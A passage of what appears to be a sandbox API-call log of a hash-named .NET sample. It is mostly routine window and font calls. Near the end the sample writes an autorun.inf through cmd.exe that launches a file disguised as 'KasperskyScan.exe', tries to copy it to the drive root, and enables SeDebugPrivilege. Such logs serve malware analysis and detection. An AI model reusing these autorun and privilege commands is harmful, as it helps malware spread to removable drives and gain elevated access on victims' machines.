graphics=0x5a6f268, height=0x1aeee0) returned 0x0 [0119.081] GdipGetEmHeight (family=0x5a65b60, style=0, EmHeight=0x1aeee8) returned 0x0 [0119.081] GdipGetLineSpacing (family=0x5a65b60, style=0, LineSpacing=0x1aeee8) returned 0x0 [0119.082] GdipDeleteGraphics (graphics=0x5a6f268) returned 0x0 [0119.084] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0119.084] GdipCreateFont (fontFamily=0x5a65b60, emSize=0x41040000, style=0, unit=0x3, font=0x210c54c) returned 0x0 [0119.084] GdipGetFontSize (font=0x4a5efc0, size=0x210c550) returned 0x0 [0119.084] GdipDeleteFont (font=0x4a51f08) returned 0x0 [0119.084] GetDC (hWnd=0x0) returned 0xa0100d0 [0119.085] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x1aef50) returned 0x0 [0119.085] GdipGetFontHeight (font=0x4a5efc0, graphics=0x5a6f268, height=0x1aef48) returned 0x0 [0119.085] GdipDeleteGraphics (graphics=0x5a6f268) returned 0x0 [0119.085] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0119.093] GetSystemMetrics (nIndex=5) returned 1 [0119.093] GetSystemMetrics (nIndex=6) returned 1 [0119.093] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.093] AdjustWindowRectEx (in: lpRect=0x1af01c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1af01c) returned 1 [0119.094] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.094] AdjustWindowRectEx (in: lpRect=0x1af018, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1af018) returned 1 [0119.094] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.094] AdjustWindowRectEx (in: lpRect=0x1af01c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1af01c) returned 1 [0119.123] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.123] AdjustWindowRectEx (in: lpRect=0x1af020, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1af020) returned 1 [0119.285] UpdateWindow (hWnd=0x0) returned 0 [0119.357] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x1aeff8) returned 0x0 [0119.357] GdipCreateFont (fontFamily=0x5a65b60, emSize=0x41600000, style=0, unit=0x3, font=0x210cd6c) returned 0x0 [0119.357] GdipGetFontSize (font=0x4a51f08, size=0x210cd70) returned 0x0 [0119.600] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.600] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aef7c) returned 1 [0119.716] GetProcessWindowStation () returned 0xd0 [0119.717] GetUserObjectInformationA (in: hObj=0xd0, nIndex=1, pvInfo=0x210d4bc, nLength=0xc, lpnLengthNeeded=0x1aee58 | out: pvInfo=0x210d4bc, lpnLengthNeeded=0x1aee58) returned 1 [0119.729] SetConsoleCtrlHandler (HandlerRoutine=0x48d0636, Add=1) returned 1 [0119.730] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0119.730] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0119.731] GetClassInfoW (in: hInstance=0x10000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x210d520 | out: lpWndClass=0x210d520) returned 0 [0119.733] CoTaskMemAlloc (cb=0x58) returned 0x710ce0 [0119.733] RegisterClassW (lpWndClass=0x1aeda8) returned 0xc1de [0119.736] CoTaskMemFree (pv=0x710ce0) [0119.737] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x801f4 [0119.738] NtdllDefWindowProc_W (hWnd=0x801f4, Msg=0x81, wParam=0x0, lParam=0x1ae8e8) returned 0x1 [0119.741] NtdllDefWindowProc_W (hWnd=0x801f4, Msg=0x83, wParam=0x0, lParam=0x1ae8d4) returned 0x0 [0119.741] NtdllDefWindowProc_W (hWnd=0x801f4, Msg=0x1, wParam=0x0, lParam=0x1ae8e8) returned 0x0 [0119.742] NtdllDefWindowProc_W (hWnd=0x801f4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0119.742] NtdllDefWindowProc_W (hWnd=0x801f4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0119.810] GetSysColor (nIndex=10) returned 0xb4b4b4 [0119.811] GetSysColor (nIndex=2) returned 0xd1b499 [0119.811] GetSysColor (nIndex=9) returned 0x0 [0119.811] GetSysColor (nIndex=12) returned 0xababab [0119.811] GetSysColor (nIndex=15) returned 0xf0f0f0 [0119.811] GetSysColor (nIndex=20) returned 0xffffff [0119.811] GetSysColor (nIndex=16) returned 0xa0a0a0 [0119.811] GetSysColor (nIndex=15) returned 0xf0f0f0 [0119.811] GetSysColor (nIndex=16) returned 0xa0a0a0 [0119.811] GetSysColor (nIndex=21) returned 0x696969 [0119.811] GetSysColor (nIndex=22) returned 0xe3e3e3 [0119.811] GetSysColor (nIndex=20) returned 0xffffff [0119.811] GetSysColor (nIndex=18) returned 0x0 [0119.811] GetSysColor (nIndex=1) returned 0x0 [0119.811] GetSysColor (nIndex=27) returned 0xead1b9 [0119.811] GetSysColor (nIndex=28) returned 0xf2e4d7 [0119.811] GetSysColor (nIndex=17) returned 0x6d6d6d [0119.811] GetSysColor (nIndex=13) returned 0xff9933 [0119.811] GetSysColor (nIndex=14) returned 0xffffff [0119.811] GetSysColor (nIndex=26) returned 0xcc6600 [0119.811] GetSysColor (nIndex=11) returned 0xfcf7f4 [0119.811] GetSysColor (nIndex=3) returned 0xdbcdbf [0119.811] GetSysColor (nIndex=19) returned 0x0 [0119.812] GetSysColor (nIndex=24) returned 0xe1ffff [0119.812] GetSysColor (nIndex=23) returned 0x0 [0119.812] GetSysColor (nIndex=4) returned 0xf0f0f0 [0119.812] GetSysColor (nIndex=30) returned 0xf0f0f0 [0119.812] GetSysColor (nIndex=29) returned 0xff9933 [0119.812] GetSysColor (nIndex=7) returned 0x0 [0119.812] GetSysColor (nIndex=0) returned 0xc8c8c8 [0119.812] GetSysColor (nIndex=5) returned 0xffffff [0119.812] GetSysColor (nIndex=6) returned 0x646464 [0119.812] GetSysColor (nIndex=8) returned 0x0 [0119.877] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.877] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aef7c) returned 1 [0119.878] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x1aeff8) returned 0x0 [0119.879] GdipCreateFont (fontFamily=0x5a65b60, emSize=0x41040000, style=0, unit=0x3, font=0x210d8c0) returned 0x0 [0119.879] GdipGetFontSize (font=0x5a6af30, size=0x210d8c4) returned 0x0 [0119.933] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.934] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x56210044, bMenu=0, dwExStyle=0x200 | out: lpRect=0x1aef7c) returned 1 [0119.934] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.934] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x56210044, bMenu=0, dwExStyle=0x200 | out: lpRect=0x1aef7c) returned 1 [0119.935] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x1aeff8) returned 0x0 [0119.935] GdipCreateFont (fontFamily=0x5a65b60, emSize=0x41140000, style=0, unit=0x3, font=0x210da40) returned 0x0 [0119.935] GdipGetFontSize (font=0x5a6af58, size=0x210da44) returned 0x0 [0119.935] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.935] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aef7c) returned 1 [0119.935] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0119.936] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aef7c) returned 1 [0119.936] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0120.252] AdjustWindowRectEx (in: lpRect=0x1aefa8, dwStyle=0x56012f00, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aefa8) returned 1 [0120.253] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0120.253] AdjustWindowRectEx (in: lpRect=0x1aefa8, dwStyle=0x56012f00, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aefa8) returned 1 [0120.262] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x1aeff8) returned 0x0 [0120.262] GdipCreateFont (fontFamily=0x5a65b60, emSize=0x41440000, style=0, unit=0x3, font=0x210e3f8) returned 0x0 [0120.262] GdipGetFontSize (font=0x5a6af80, size=0x210e3fc) returned 0x0 [0120.262] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0120.263] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aef7c) returned 1 [0120.263] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0120.263] AdjustWindowRectEx (in: lpRect=0x1aef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aef7c) returned 1 [0120.390] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe.config", nBufferLength=0x105, lpBuffer=0x1ae8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe.config", lpFilePart=0x0) returned 0x69 [0120.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aed7c) returned 1 [0120.390] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1aedf8 | out: lpFileInformation=0x1aedf8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0120.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aed78) returned 1 [0121.699] GdipLoadImageFromStream (stream=0x4670030, image=0x1aea70) returned 0x0 [0122.512] GdipImageForceValidation (image=0x5a6f268) returned 0x0 [0122.517] GdipGetImageType (image=0x5a6f268, type=0x1aea6c) returned 0x0 [0122.517] GdipGetImageRawFormat (image=0x5a6f268, format=0x1ae9ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0122.520] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.520] AdjustWindowRectEx (in: lpRect=0x1aefa8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aefa8) returned 1 [0122.521] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.521] AdjustWindowRectEx (in: lpRect=0x1aefa8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aefa8) returned 1 [0122.708] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.708] AdjustWindowRectEx (in: lpRect=0x1aefdc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x1aefdc) returned 1 [0122.708] GetSystemMetrics (nIndex=59) returned 1444 [0122.708] GetSystemMetrics (nIndex=60) returned 904 [0122.708] GetSystemMetrics (nIndex=34) returned 136 [0122.708] GetSystemMetrics (nIndex=35) returned 39 [0122.709] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.709] AdjustWindowRectEx (in: lpRect=0x1aeedc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x1aeedc) returned 1 [0122.709] GetCurrentThreadId () returned 0xcb0 [0122.709] GetCurrentThreadId () returned 0xcb0 [0122.718] GetCurrentThreadId () returned 0xcb0 [0122.718] GetCurrentThreadId () returned 0xcb0 [0122.719] GetCurrentThreadId () returned 0xcb0 [0122.719] GetCurrentThreadId () returned 0xcb0 [0122.719] GetCurrentThreadId () returned 0xcb0 [0122.719] GetCurrentThreadId () returned 0xcb0 [0122.719] GetCurrentThreadId () returned 0xcb0 [0122.719] GetCurrentThreadId () returned 0xcb0 [0122.720] GetCurrentThreadId () returned 0xcb0 [0122.720] GetCurrentThreadId () returned 0xcb0 [0122.720] CreateCompatibleDC (hdc=0x0) returned 0x210106be [0122.721] GetDC (hWnd=0x0) returned 0xa0100d0 [0122.721] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x1aee18) returned 0x0 [0122.722] CoTaskMemAlloc (cb=0x5c) returned 0x718b18 [0122.823] GdipGetLogFontW (font=0x4a5efc0, graphics=0x5a77ee8, logfontW=0x718b18) returned 0x0 [0122.963] CoTaskMemFree (pv=0x718b18) [0122.963] CoTaskMemAlloc (cb=0x5c) returned 0x718cb8 [0122.963] CoTaskMemFree (pv=0x718cb8) [0122.963] CoTaskMemAlloc (cb=0x5c) returned 0x718a48 [0122.964] CoTaskMemFree (pv=0x718a48) [0122.964] GdipDeleteGraphics (graphics=0x5a77ee8) returned 0x0 [0122.964] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0122.964] CoTaskMemAlloc (cb=0x5c) returned 0x718ab0 [0122.964] CreateFontIndirectW (lplf=0x718ab0) returned 0x250a06c4 [0122.964] CoTaskMemFree (pv=0x718ab0) [0122.965] SelectObject (hdc=0x210106be, h=0x250a06c4) returned 0x18a0048 [0122.965] GetTextMetricsW (in: hdc=0x210106be, lptm=0x1aef24 | out: lptm=0x1aef24) returned 1 [0122.965] GetTextExtentPoint32W (in: hdc=0x210106be, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x2125678 | out: psizl=0x2125678) returned 1 [0122.966] SelectObject (hdc=0x210106be, h=0x18a0048) returned 0x250a06c4 [0122.967] DeleteDC (hdc=0x210106be) returned 1 [0122.968] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.968] AdjustWindowRectEx (in: lpRect=0x1aec90, dwStyle=0x2c40000, bMenu=0, dwExStyle=0x10001 | out: lpRect=0x1aec90) returned 1 [0122.968] AdjustWindowRectEx (in: lpRect=0x1aeeb0, dwStyle=0x2c40000, bMenu=0, dwExStyle=0x10001 | out: lpRect=0x1aeeb0) returned 1 [0122.969] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.969] AdjustWindowRectEx (in: lpRect=0x1aec08, dwStyle=0x2c40000, bMenu=0, dwExStyle=0x10001 | out: lpRect=0x1aec08) returned 1 [0122.969] AdjustWindowRectEx (in: lpRect=0x1aece8, dwStyle=0x2c40000, bMenu=0, dwExStyle=0x10001 | out: lpRect=0x1aece8) returned 1 [0122.978] GetSystemMetrics (nIndex=59) returned 1444 [0122.978] GetSystemMetrics (nIndex=60) returned 904 [0122.978] GetSystemMetrics (nIndex=34) returned 136 [0122.978] GetSystemMetrics (nIndex=35) returned 39 [0122.978] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.979] AdjustWindowRectEx (in: lpRect=0x1aeb98, dwStyle=0x2c40000, bMenu=0, dwExStyle=0x10001 | out: lpRect=0x1aeb98) returned 1 [0122.979] AdjustWindowRectEx (in: lpRect=0x1aec5c, dwStyle=0x2c40000, bMenu=0, dwExStyle=0x10001 | out: lpRect=0x1aec5c) returned 1 [0122.979] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.979] AdjustWindowRectEx (in: lpRect=0x1aeea8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aeea8) returned 1 [0122.979] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.979] AdjustWindowRectEx (in: lpRect=0x1aed0c, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aed0c) returned 1 [0122.980] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.980] AdjustWindowRectEx (in: lpRect=0x1aecc8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aecc8) returned 1 [0122.980] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.980] AdjustWindowRectEx (in: lpRect=0x1aeea8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aeea8) returned 1 [0122.980] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.980] AdjustWindowRectEx (in: lpRect=0x1aed0c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aed0c) returned 1 [0122.981] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.981] AdjustWindowRectEx (in: lpRect=0x1aec9c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aec9c) returned 1 [0122.981] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.981] AdjustWindowRectEx (in: lpRect=0x1aeea8, dwStyle=0x56012f00, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aeea8) returned 1 [0122.981] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.981] AdjustWindowRectEx (in: lpRect=0x1aed0c, dwStyle=0x56012f00, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aed0c) returned 1 [0122.982] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.982] AdjustWindowRectEx (in: lpRect=0x1aecc8, dwStyle=0x56012f00, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aecc8) returned 1 [0122.982] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.982] AdjustWindowRectEx (in: lpRect=0x1aeea8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aeea8) returned 1 [0122.982] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.982] AdjustWindowRectEx (in: lpRect=0x1aed0c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aed0c) returned 1 [0122.982] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.983] AdjustWindowRectEx (in: lpRect=0x1aec9c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aec9c) returned 1 [0122.983] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.983] AdjustWindowRectEx (in: lpRect=0x1aeea8, dwStyle=0x56210044, bMenu=0, dwExStyle=0x200 | out: lpRect=0x1aeea8) returned 1 [0122.983] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.983] AdjustWindowRectEx (in: lpRect=0x1aed0c, dwStyle=0x56210044, bMenu=0, dwExStyle=0x200 | out: lpRect=0x1aed0c) returned 1 [0122.983] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.984] AdjustWindowRectEx (in: lpRect=0x1aec9c, dwStyle=0x56210044, bMenu=0, dwExStyle=0x200 | out: lpRect=0x1aec9c) returned 1 [0122.984] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.984] AdjustWindowRectEx (in: lpRect=0x1aeea8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aeea8) returned 1 [0122.984] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.984] AdjustWindowRectEx (in: lpRect=0x1aed0c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aed0c) returned 1 [0122.984] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0122.984] AdjustWindowRectEx (in: lpRect=0x1aec9c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1aec9c) returned 1 [0123.197] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x728b90 [0123.197] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x712b38 [0123.198] ShellExecuteExW (in: pExecInfo=0x2125bb8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C echo ^[autorun^] >autorun.inf", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2125bb8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C echo ^[autorun^] >autorun.inf", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x438)) returned 1 [0128.735] LocalFree (hMem=0x728b90) returned 0x0 [0128.736] LocalFree (hMem=0x712b38) returned 0x0 [0128.825] GetCurrentProcess () returned 0xffffffff [0128.825] GetCurrentProcess () returned 0xffffffff [0128.826] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x438, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x3bc) returned 1 [0128.831] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x3bc, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0145.732] CloseHandle (hObject=0x3bc) returned 1 [0145.733] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x7515c0 [0145.733] LocalAlloc (uFlags=0x0, uBytes=0x60) returned 0x718cb8 [0145.733] ShellExecuteExW (in: pExecInfo=0x2125dec*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C echo ^open^=KasperskyScan^.exe >>autorun.inf", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2125dec*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C echo ^open^=KasperskyScan^.exe >>autorun.inf", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x448)) returned 1 [0145.762] LocalFree (hMem=0x7515c0) returned 0x0 [0145.762] LocalFree (hMem=0x718cb8) returned 0x0 [0145.762] GetCurrentProcess () returned 0xffffffff [0145.762] GetCurrentProcess () returned 0xffffffff [0145.762] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x424) returned 1 [0145.762] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x424, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0146.686] CloseHandle (hObject=0x424) returned 1 [0146.686] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751530 [0146.686] LocalAlloc (uFlags=0x0, uBytes=0x66) returned 0x709f68 [0146.686] ShellExecuteExW (in: pExecInfo=0x2126000*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C echo ^execute=^KasperskyScan^.exe >>autorun.inf", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2126000*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C echo ^execute=^KasperskyScan^.exe >>autorun.inf", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x44c)) returned 1 [0146.721] LocalFree (hMem=0x751530) returned 0x0 [0146.721] LocalFree (hMem=0x709f68) returned 0x0 [0146.721] GetCurrentProcess () returned 0xffffffff [0146.721] GetCurrentProcess () returned 0xffffffff [0146.722] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x434) returned 1 [0146.722] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x434, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0147.367] CloseHandle (hObject=0x434) returned 1 [0147.457] GetLogicalDrives () returned 0x4 [0147.545] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.678] GetFullPathNameW (in: lpFileName="autorun.inf", nBufferLength=0x105, lpBuffer=0x1aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf", lpFilePart=0x0) returned 0x29 [0147.678] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.678] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf"), lpNewFileName="C:\\" (normalized: "c:"), bFailIfExists=1) returned 0 [0147.723] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0147.723] CloseHandle (hObject=0x434) returned 1 [0149.308] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1aeb6c | out: lpLuid=0x1aeb6c*(LowPart=0x14, HighPart=0)) returned 1 [0149.309] GetCurrentProcess () returned 0xffffffff [0149.310] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x1aeb68 | out: TokenHandle=0x1aeb68*=0x3b8) returned 1 [0149.310] AdjustTokenPrivileges (in: TokenHandle=0x3b8, DisableAllPrivileges=0, NewState=0x212816c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0149.310] CloseHandle (hObject=0x3b8) returned 1 [0149.310] GetCurrentProcess () returned 0xffffffff [0149.310] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x1af244 | out: TokenHandle=0x1af244*=0x3b8) returned 1 [0149.311] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1af23c | out: lpLuid=0x1af23c*(LowPart=0x14, HighPart=0)) returned 1 [0149.311] AdjustTokenPrivileges (in: TokenHandle=0x3b8, DisableAllPrivileges=0, NewState=0x2128184*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0149.312] CloseHandle (hObject=0x3b8) returned 1 [0149.312] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751488 